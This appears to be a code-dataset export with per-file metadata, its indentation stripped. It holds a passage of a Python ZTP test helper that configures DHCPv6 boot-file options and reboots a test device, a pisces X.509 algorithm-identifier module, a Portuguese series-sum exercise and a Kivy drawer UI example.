:param ssh_conn_obj:
:param ztp_params:
:param config_params:
:param options:
:return:
"""
cli_type = st.get_ui_type(config_params.dut, cli_type=cli_type)
retry_count = config_params.retry_count if "retry_count" in config_params and config_params.retry_count else 0
iteration = config_params.iteration if "iteration" in config_params and config_params.iteration else 300
delay = config_params.delay if "delay" in config_params and config_params.delay else 3
expect_reboot = True if "expect_reboot" in options and options ["expect_reboot"] else False
st.log(config_params)
if "func_name" in config_params:
syslog_file_names = ["syslog_1_{}".format(config_params.func_name), "syslog_{}".format(config_params.func_name)]
if "json_content" in config_params:
file_path = basic_obj.write_to_json_file(config_params.json_content)
st.log(file_path)
if file_path:
destination_path = "{}{}/{}".format(config_params.home_path, ztp_params.config_path, config_params.ztp_file)
st.log(destination_path)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
config_params.option_59_url = "http://[{}]{}/{}".format(config_params.static_ip, ztp_params.config_path, config_params.ztp_file)
config_params.search_pattern = r'\s*option\s+dhcp6.boot-file-url\s+"\S+";'
write_option_59_to_dhcp_server(ssh_conn_obj, config_params)
basic_obj.service_operations(ssh_conn_obj, config_params.dhcp6_service_name, "restart", "server")
if not verify_dhcpd_service_status(ssh_conn_obj, config_params.dhcpd6_pid):
st.log("{} service is running which is not expected".format(config_params.dhcp6_service_name))
st.report_fail("service_running_not_expected", config_params.dhcp6_service_name)
reboot_type = config_params.reboot_type if "reboot_type" in config_params and config_params.reboot_type else "normal"
if "ztp_operation" in config_params:
config_params.ztp_operation = "reboot" if cli_type == "klish" else config_params.ztp_operation
if config_params.ztp_operation == "reboot":
basic_obj.remove_file(config_params.dut, config_params.config_db_path)
st.reboot(config_params.dut, reboot_type, skip_port_wait=True)
elif config_params.ztp_operation == "run":
ztp_operations(config_params.dut, config_params.ztp_operation)
else:
st.log("ZTP operation is not mentioned hence rebooting the device ...")
basic_obj.remove_file(config_params.dut, config_params.config_db_path)
st.reboot(config_params.dut, reboot_type, skip_port_wait=True)
if "reboot_on_success" in options and options["reboot_on_success"]:
result = verify_ztp_status(config_params.dut, retry_count, iteration, delay, expect_reboot=expect_reboot, reboot_on_success=options["reboot_on_success"], cli_type=cli_type)
else:
result = verify_ztp_status(config_params.dut, retry_count, iteration, delay, expect_reboot=expect_reboot, cli_type=cli_type)
if not result:
if "logs_path" in config_params and "func_name" in config_params:
capture_syslogs(config_params.dut, config_params.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
if "reboot_on_success" in options and options["reboot_on_success"]:
reboot_obj.config_reload(config_params.dut)
st.wait(5)
if not ip_obj.ping(config_params.dut, config_params.static_ip, family="ipv6"):
st.log("Pinging to DHCP server failed from DUT, issue either with DUT or server")
# intf_obj.enable_dhcp_on_interface(config_params.dut, config_params.network_port, "v6")
if not verify_ztp_status(config_params.dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in config_params and "func_name" in config_params:
capture_syslogs(config_params.dut, config_params.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
verify_ztp_filename_logs(config_params.dut, config_params)
if "ztp_log_string" in config_params and config_params.ztp_log_string:
if not basic_obj.poll_for_error_logs(config_params.dut, config_params.ztp_log_path, config_params.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(config_params.ztp_log_path, config_params.ztp_log_string))
if not basic_obj.poll_for_error_logs(config_params.dut, config_params.ztp_log_path_1, config_params.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(config_params.ztp_log_path_1, config_params.ztp_log_string))
st.report_fail("ztp_log_verification_failed", config_params.ztp_log_path_1, config_params.ztp_log_string)
if "result" in config_params and config_params.result == "pass":
st.report_pass("test_case_passed")
def write_option_59_to_dhcp_server(connection_obj, data):
"""
API to add option 59 in DHCP config file.
:param connection_obj:
:param data:
:return:
"""
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
option_59 = "option dhcp6.boot-file-url "
option_59_path = data["option_59_url"]
option_59_config = "'{} \"{}\";'".format(option_59, option_59_path)
if line_number >= 0:
basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
basic_obj.write_to_file(connection_obj, option_59_config, data.dhcp_config_file, device="server")
# else:
# basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
# basic_obj.write_to_file_to_line(connection_obj, option_59_config, line_number, data.dhcp_config_file, device="server")
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
if line_number <=0:
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def write_option_to_dhcp_server(connection_obj, data):
"""
Common API to write matched line with new one
:param connection_obj:
:param data:
:return:
"""
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
option = data.option_string # "option dhcp6.boot-file-url "
option_path = data.option_url
st.log("#####LINE NUMBER{}".format(line_number))
option_config = "'{} \"{}\";'".format(option, option_path)
if int(line_number) > 0:
# line_number = data.line_number if line_number in data else 60
basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
basic_obj.write_to_file(connection_obj, option_config, data.dhcp_config_file, device="server")
# basic_obj.write_to_file_to_line(connection_obj, option_config, line_number, data.dhcp_config_file, device="server")
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
st.log("#####LINE NUMBER{}".format(line_number))
if line_number <= 0:
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def clear_options_from_dhcp_server(connection_obj, data):
st.log("Clearing OPTIONS from DHCP server")
option = ""
if "option_type" in data and data.option_type == "option_67":
option = r'\s*option\s+bootfile-name\s*\S*\s*"\S+";'
elif "option_type" in data and data.option_type == "option_239":
option = r'\s*option\s+provision-url\s*\S*\s*"\S+";'
elif "option_type" in data and data.option_type == "option_59":
option = r'\s*option\s+dhcp6.boot-file-url\s+"\S+";'
elif "option_type" in data and data.option_type == "option_225":
option = r'\s*option option-225\s*\S*\s*"\S+";'
st.log("OPTION is {}".format(option))
st.log("CONFIG FILE is {}".format(data.dhcp_config_file))
if option:
line_number = basic_obj.get_file_number_with_regex(connection_obj,
option, data.dhcp_config_file)
if line_number > 0:
basic_obj.delete_line_using_line_number(connection_obj, line_number,
data.dhcp_config_file)
def verify_dhcpd_service_status(dut, process_id):
"""
API to verify DHCLIENT on provided interface using ps aux command
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
:param dut:
:param search_string:
:param interface:
:param expected_count:
:return:
"""
st.log("Verifying DHCPD for {} ".format(process_id))
dhcpd_pid = "/run/dhcp-server/{}".format(process_id)
ps_aux = basic_obj.get_ps_aux(dut, dhcpd_pid, device="server")
st.log(ps_aux)
config_string = ""
if process_id == "dhcpd6.pid":
config_string = "-cf /etc/dhcp/dhcpd6.conf"
if process_id == "dhcpd.pid":
config_string = "-cf /etc/dhcp/dhcpd.conf"
st.log("Verifying the output with {}".format(config_string))
if config_string not in ps_aux:
st.log("Required DHCPD service not found ...")
return False
return True
def capture_syslogs(dut, destination_path, file_name):
file_names = list(file_name) if isinstance(file_name, list) else [file_name]
syslog_paths = ["/var/log/syslog.1", "/var/log/syslog"]
for i, syslog_path in enumerate(syslog_paths):
dst_file = "{}/{}".format(destination_path, file_names[i])
st.download_file_from_dut(dut, syslog_path, dst_file)
return True
| 48.960512 | 180 | 0.637545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13,948 | 0.304037 |
33c6fc7c6a43f33fca1acd3e80bf340a6e154be0 | 2,881 | py | Python | pisces/algid.py | danieljohnlewis/pisces | 7e7ed9c87692c01b591e14db73a3a7047992e91c | [
"MIT"
] | 1 | 2021-02-03T23:05:19.000Z | 2021-02-03T23:05:19.000Z | pisces/algid.py | danieljohnlewis/pisces | 7e7ed9c87692c01b591e14db73a3a7047992e91c | [
"MIT"
] | null | null | null | pisces/algid.py | danieljohnlewis/pisces | 7e7ed9c87692c01b591e14db73a3a7047992e91c | [
"MIT"
] | 1 | 2017-04-05T16:11:11.000Z | 2017-04-05T16:11:11.000Z | """Handle for X.509 AlgorithmIdentifier objects
This module understands a minimal number of OIDS, just enough X.509
stuff needed for PKCS 1 & 7.
"""
import types
from pisces import asn1
oid_dsa = asn1.OID((1, 2, 840, 10040, 4, 1))
oid_dsa_sha1 = asn1.OID((1, 2, 840, 10040, 4, 3))
oid_rsa = asn1.OID((1, 2, 840, 113549, 1, 1, 1))
oid_rsa_md2 = asn1.OID((1, 2, 840, 113549, 1, 1, 2))
oid_rsa_md5 = asn1.OID((1, 2, 840, 113549, 1, 1, 4))
oid_md2 = asn1.OID((1, 2, 840, 113549, 2, 2))
oid_md5 = asn1.OID((1, 2, 840, 113549, 2, 5))
oid_sha = asn1.OID((1, 3, 14, 3, 2, 26))
class AlgorithmIdentifier(asn1.ASN1Object):
"""the type of the algorithm plus optional parameters
public read-only attributes: oid, params, name
AlgorithmIdentifier ::= SEQUENCE {
algorithm OBJECT IDENTIFIER,
parameters ANY DEFINED BY algorithm OPTIONAL }
defined by X.509
"""
__dict = {oid_dsa_sha1: 'dsaWithSha1',
oid_rsa_md2: 'md2withRSAEncryption',
oid_rsa_md5: 'md5withRSAEncryption',
oid_rsa: 'rsa',
oid_dsa: 'dsa',
oid_sha: 'sha',
oid_md2: 'md2',
oid_md5: 'md5',
}
def __init__(self, obj=None, params=None):
self.oid = None
self.params = None
self.name = None
if obj and (isinstance(obj, asn1.Sequence)
or type(obj) == types.ListType):
self._decode(obj)
elif obj:
assert isinstance(obj, asn1.OID)
self.oid = obj
self.params = params
self.name = self.__dict.get(self.oid, None)
def _decode(self, obj):
self.oid, self.params = obj
def __cmp__(self, other):
if isinstance(other, AlgorithmIdentifier):
return cmp((self.oid, self.params), (other.oid, other.params))
elif isinstance(other, asn1.Sequence):
return cmp([self.oid, self.params], other.val)
elif isinstance(other, list):
# Because python passes by assignment, the val is taken on comparison. Therefore we check for list (as returned by calling .val).
return cmp([self.oid, self.params], other)
return -1
def __repr__(self):
if self.params:
return "<%s: %s>" % (self.name or self.oid, self.params)
else:
return "<" + (self.name or repr(self.oid)) + ">"
def _encode(self, io):
contents = [self.oid.encode()]
if self.params:
contents.append(self.params.encode())
else:
contents.append(asn1.unparseNull())
io.write(asn1.unparseSequence(contents))
def test():
global x, buf, y
x = AlgorithmIdentifier(oid_rsa_md5, None)
buf = x.encode()
y = asn1.parse(buf)
assert x == y, "pisces.algid: AlgorithmIdentifier encode/decode failed"
if __name__ == "__main__":
test()
| 31.659341 | 132 | 0.596668 | 2,065 | 0.716765 | 0 | 0 | 0 | 0 | 0 | 0 | 740 | 0.256855 |
33c729c649ab0cb56e1862e14fe0847fbb9b4398 | 230 | py | Python | exercicios/Lista3/Q31.py | AlexandrePeBrito/CursoUdemyPython | 3de58cb30c9f333b32078309847179ff3f9d7e22 | [
"MIT"
] | null | null | null | exercicios/Lista3/Q31.py | AlexandrePeBrito/CursoUdemyPython | 3de58cb30c9f333b32078309847179ff3f9d7e22 | [
"MIT"
] | null | null | null | exercicios/Lista3/Q31.py | AlexandrePeBrito/CursoUdemyPython | 3de58cb30c9f333b32078309847179ff3f9d7e22 | [
"MIT"
] | null | null | null | #Faça um programa que calcule e escreva o valor de S
# S=1/1+3/2+5/3+7/4...99/50
u=1
valores=[]
for c in range(1,100):
if(c%2==1):
valores.append(round(c/u,2))
u+=1
print(valores)
print(f"S = {sum(valores)}")
| 19.166667 | 52 | 0.586957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.437229 |
33c94b4ecccf7fc17e12956a7c221ae80de3cbe0 | 3,138 | py | Python | examples/for_debug.py | gottadiveintopython/kivyx.uix.drawer | a4de9c8ee65892c16278499f1134b93678a5a01b | [
"MIT"
] | null | null | null | examples/for_debug.py | gottadiveintopython/kivyx.uix.drawer | a4de9c8ee65892c16278499f1134b93678a5a01b | [
"MIT"
] | null | null | null | examples/for_debug.py | gottadiveintopython/kivyx.uix.drawer | a4de9c8ee65892c16278499f1134b93678a5a01b | [
"MIT"
] | null | null | null | from kivy.app import runTouchApp
from kivy.properties import StringProperty
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.lang import Builder
from kivyx.uix.drawer import KXDrawer
class Numpad(GridLayout):
def on_kv_post(self, *args, **kwargs):
super().on_kv_post(*args, **kwargs)
for text in '7 8 9 * 4 5 6 / 1 2 3 del 0 + - ent'.split():
self.add_widget(Button(
text=text,
size_hint=(None, None, ),
size=(50, 50, ),
font_size=24,
))
class MenuItem(BoxLayout):
anchor = StringProperty()
@property
def drawer(self):
return self.parent.parent.ids.drawer
root = Builder.load_string(r'''
<Numpad>:
cols: 4
rows: 4
spacing: 10
padding: 10
size_hint: None, None
size: self.minimum_size
<Separator@Widget>:
size: 1, 1
canvas:
Color:
rgb: 1, 0, 1
Rectangle:
pos: self.pos
size: self.size
<MenuItem>:
CheckBox:
group: 'menuitem'
on_active: root.drawer.anchor = root.anchor
Label:
text: root.anchor
<StencilFloatLayout@StencilView+FloatLayout>:
BoxLayout:
StencilFloatLayout:
# RelativeLayout:
FloatLayout:
size_hint: .9, .9
pos_hint: {'center_x': .5, 'center_y': .5, }
canvas.after:
Color:
rgb: 1, 1, 1,
Line:
dash_offset: 4
dash_length: 2
rectangle: [*self.pos, *self.size, ]
KXDrawer:
id: drawer
anchor: 'tr'
auto_bring_to_front: True
size_hint: None, None
size: numpad.size
disabled: disabled.active
Numpad:
id: numpad
KXDrawer:
anchor: 'rt'
auto_bring_to_front: True
size_hint: None, None
size: 100, 100
Button:
KXDrawer:
anchor: 'bm'
size_hint: None, None
size: 2, 10
Separator:
size_hint_x: None
BoxLayout:
id: menu
size_hint_x: .1
size_hint_min_x: 100
orientation: 'vertical'
spacing: dp(4)
Label:
text: 'disabled'
color: 0, 1, 0, 1
Switch:
id: disabled
active: False
Separator:
size_hint_y: None
Label:
text: 'methods'
color: 0, 1, 0, 1
Button:
text: 'open()'
on_press: drawer.open()
Button:
text: 'close()'
on_press: drawer.close()
Separator:
size_hint_y: None
Label:
text: 'anchor'
color: 0, 1, 0, 1
''')
menu = root.ids.menu
for anchor in KXDrawer.anchor.options:
menu.add_widget(MenuItem(anchor=anchor))
runTouchApp(root)
| 24.904762 | 66 | 0.500319 | 500 | 0.159337 | 0 | 0 | 76 | 0.024219 | 0 | 0 | 2,251 | 0.717336 |